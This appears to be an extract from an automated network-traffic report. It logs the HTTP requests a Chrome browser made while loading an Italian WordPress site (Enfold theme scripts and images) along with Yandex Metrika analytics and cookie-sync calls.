    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow-video.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fwww.cipassoitalia.it%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.132%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.132%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.132%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A1370925244722%3Ahid%3A679857121%3Az%3A-300%3Ai%3A20250103113304%3Aet%3A1735921984%3Ac%3A1%3Arn%3A888462558%3Arqn%3A1%3Au%3A1735921984342483081%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A15621%3Awv%3A2%3Ads%3A86%2C715%2C461%2C117%2C777%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1735921964729%3Arqnl%3A1%3Ast%3A1735921986%3At%3ACiPASSO.%20Nel%20cuore%20di%20Roma%2C%20ad%20un%20passo%20dal%20Pantheon.&t=gdpr%2814%29clc%280-0-0%29rqnt%281%29aw%281%29rcm%281%29cdl%28na%29eco%2842009088%29fid%28160%29ti%281%29 HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=narlABsq63nROyU6LhKlC/QyBgl1C5gTK9qc3JdRc3H3zDytph2vBN10ZgqZgH/k820S88p65t19wIhYvE7/vXqicU8=; yandexuid=8563067781735921985; yashr=2978277861735921985; yabs-sid=814606481735921986; yuidss=8563067781735921985; ymex=1767457986.yrts.1735921986; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timeline/timeline.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles/toggles.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /sync_cookie_image_start?redirect_domain=mc.yandex.com&token=10611.THIYYAEe98v2mU_77etvw6y980yLbM-16KV3AOlKlsqX0zDes6MVlFAFoFiiYNqR.FjbGmflqlBBumniBfAOlX96YIeU%2C HTTP/1.1Host: mc.yandex.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=MWn/b3CGBdGz4xwo6ybs8zuB0m6dqTWEZs6SfrZEPLGuS1njVyPf5dksYDS0w6MqEEVqybkB7y6BVJBOmOuiQIuKgyY=; yandexuid=5258352291735921983; yashr=2056106971735921983
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/aviapopup/jquery.magnific-popup.min.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/avia-snippet-lightbox.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/avia-snippet-sticky-header.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/avia-snippet-widget.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timeline/timeline.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/framework/js/conditional_load/avia_google_maps_front.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles/toggles.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /sync_cookie_image_decide?token=10611.DeDvDEkh2b6Its9xbNfPHxCK1804kA6_zZJVWLPPWz07-944RJ_J0kYNra_afEkwU03UV0CHnydP5no6KoQ54vkblvuIBsG-969Amgl-cxtmyCk1lkokidjPnkQ91qsTV1SpIOp7NPyr1RezhjfwvFpEDIXtlvS0spqHmtROf1O5xs8i-DVaMexQjDa336P2d5ZAuPOBzBztdoOKKJl7_8M1xV-u-PMh4JytiHCpED4%2C.xOk8KZm_JWiARvYJ6YX-7hS6gpY%2C HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=narlABsq63nROyU6LhKlC/QyBgl1C5gTK9qc3JdRc3H3zDytph2vBN10ZgqZgH/k820S88p65t19wIhYvE7/vXqicU8=; yandexuid=8563067781735921985; yashr=2978277861735921985; yabs-sid=814606481735921986; yuidss=8563067781735921985; ymex=1767457986.yrts.1735921986; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi; sync_cookie_csrf=962763166fake
    Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/1.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/avia-snippet-widget.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/aviapopup/jquery.magnific-popup.min.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/2.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/avia-snippet-lightbox.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/avia-snippet-sticky-header.js?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/3.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/06/sfondo_cerchi.png HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /metrika/advert.gif HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=narlABsq63nROyU6LhKlC/QyBgl1C5gTK9qc3JdRc3H3zDytph2vBN10ZgqZgH/k820S88p65t19wIhYvE7/vXqicU8=; yandexuid=8563067781735921985; yashr=2978277861735921985; yabs-sid=814606481735921986; yuidss=8563067781735921985; ymex=1767457986.yrts.1735921986; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi; sync_cookie_csrf=962763166fake
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2019/09/MG_4783-67-copia-2.jpg HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
